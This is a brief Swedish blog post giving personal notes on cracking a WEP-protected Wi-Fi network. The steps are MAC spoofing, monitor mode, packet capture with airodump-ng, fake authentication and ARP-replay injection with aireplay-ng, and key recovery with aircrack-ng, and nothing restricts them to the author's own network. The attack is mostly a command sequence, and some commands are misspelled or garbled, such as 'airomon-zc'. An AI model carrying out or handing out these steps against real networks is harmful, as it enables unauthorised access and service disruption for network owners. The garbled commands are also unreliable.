Backtrack hack wep

Att hacka wep är en ganska lätt sak.
WEP har nämligen ett fel i sig som gör att samlar man på sig tillräckligt många paket så kan man
från paketen läsa ut vad wep nyckeln är.

För att gör adet så behöver man först lyssna på en bassation som använder sig av WEP.
Efter det är det bara att hitta så många paket som man behöver runt 20 000 stycken.
Man kan även “lura” basstaionen så den skickar på paket så man kommer upp i rätt mängd.

Nedan följer mina antekningar om att knäcka WEP

hitta stationen och kanalen med airdump.
Gl;minte at bta mac innan

macchanger –mac 00:11:22:33:44:55

ifconfig wlan1 up

airomon-zc start wlan1

nu ska du ha en nic som heter mon0

Den som vi ska anv’ndat

#Borja sniffa fraffiken

airodump-ng -c channel -w filnamn --bssid macenene mon0 

#byt ut de saker som behovs for att den ska passa

#Kolla sa du kan auto mot den

aireplay-ng -1 0 -a bssid -h 00:11:22:33:44:55 -e essid

#essid e acces pukten namn ssid
// du ska se en association successful 🙂 da e allt bra

#borja lek med den sa vi far lite traffik
#du vill ha data upp till 10000

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 mon0

#Du ska vi leka lite med acces punkten
#VAR FORSIKTIG INTERNNET KAN DO HOS DOM NU

#Nu nar vi har manga paket kan vi testa att knacka wep nyckeln

aircrack-ng -b (bssid) filnamn

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.